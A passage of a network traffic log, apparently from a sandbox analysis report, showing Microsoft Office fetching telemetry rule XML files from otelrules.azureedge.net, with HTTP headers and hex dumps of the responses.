                            2024-11-14 22:39:12 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                            Session IDSource IPSource PortDestination IPDestination Port
                            123192.168.2.45525113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:12 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:12 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:12 GMT
                            Content-Type: text/xml
                            Content-Length: 1362
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                            ETag: "0x8DC582BDF497570"
                            x-ms-request-id: 58972543-701e-0097-26a8-34b8c1000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223912Z-1749fc9bdbdcm45lhC1DFWeab800000002xg00000000y44w
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:12 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            124192.168.2.45525213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:12 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:12 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:12 GMT
                            Content-Type: text/xml
                            Content-Length: 1403
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                            ETag: "0x8DC582BDC2EEE03"
                            x-ms-request-id: 29f76c25-201e-0000-6fd2-2ca537000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223912Z-16547b76f7f76p6chC1DFWctqw0000000m8g00000000ywp4
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:12 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                            Session IDSource IPSource PortDestination IPDestination Port
                            125192.168.2.45525313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:12 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:12 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:12 GMT
                            Content-Type: text/xml
                            Content-Length: 1366
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                            ETag: "0x8DC582BEA414B16"
                            x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223912Z-16547b76f7fkj7j4hC1DFW0a9g0000000m4g000000010udm
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:12 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                            Session IDSource IPSource PortDestination IPDestination Port
                            126192.168.2.45525413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:12 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:12 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:12 GMT
                            Content-Type: text/xml
                            Content-Length: 1399
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                            ETag: "0x8DC582BE1CC18CD"
                            x-ms-request-id: 9fe5a23c-201e-0051-74ab-367340000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223912Z-16547b76f7fwvr5dhC1DFW2c940000000m6g00000000atmf
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:12 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                            Session IDSource IPSource PortDestination IPDestination Port
                            127192.168.2.45525513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:12 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:12 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:12 GMT
                            Content-Type: text/xml
                            Content-Length: 1362
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                            ETag: "0x8DC582BEB256F43"
                            x-ms-request-id: 7208895d-401e-0047-32a2-348597000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223912Z-1749fc9bdbdlfqrwhC1DFWmyg8000000019000000000433q
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:12 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            128192.168.2.45525613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:13 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:13 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:13 GMT
                            Content-Type: text/xml
                            Content-Length: 1403
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                            ETag: "0x8DC582BEB866CDB"
                            x-ms-request-id: a35883a7-a01e-000d-7ea0-34d1ea000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223913Z-164f84587bfjxw6fhC1DFWq94400000000kg000000008vnb
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:13 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                            Session IDSource IPSource PortDestination IPDestination Port
                            129192.168.2.45525813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:13 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:13 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:13 GMT
                            Content-Type: text/xml
                            Content-Length: 1399
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                            ETag: "0x8DC582BE976026E"
                            x-ms-request-id: c87ec88a-b01e-00ab-2cb9-36dafd000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223913Z-16547b76f7fd4rc5hC1DFWkzhw00000000sg000000008vtv
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:13 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                            Session IDSource IPSource PortDestination IPDestination Port
                            130192.168.2.45525913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:13 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:13 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:13 GMT
                            Content-Type: text/xml
                            Content-Length: 1362
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                            ETag: "0x8DC582BDC13EFEF"
                            x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223913Z-16547b76f7fffb7lhC1DFWdsxg00000000ng000000009nkh
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            131192.168.2.45525713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:13 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:13 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:13 GMT
                            Content-Type: text/xml
                            Content-Length: 1366
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                            ETag: "0x8DC582BE5B7B174"
                            x-ms-request-id: f42d05d4-d01e-0014-06a7-34ed58000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223913Z-r178fb8d765mjvjchC1DFWhkyn000000032g000000009nm1
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                            Session IDSource IPSource PortDestination IPDestination Port
                            132192.168.2.45526013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:13 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:13 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:13 GMT
                            Content-Type: text/xml
                            Content-Length: 1425
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                            ETag: "0x8DC582BE6BD89A1"
                            x-ms-request-id: 77cd0995-b01e-0097-670b-364f33000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223913Z-16547b76f7fhvzzthC1DFW557000000000gg0000000049ae
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:13 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                            Session IDSource IPSource PortDestination IPDestination Port
                            133192.168.2.45526313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:13 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:14 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:13 GMT
                            Content-Type: text/xml
                            Content-Length: 1378
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                            ETag: "0x8DC582BDB813B3F"
                            x-ms-request-id: 5a7d4a0a-801e-0048-2940-36f3fb000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223913Z-16547b76f7fp6mhthC1DFWrggn0000000m8g00000000z13w
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
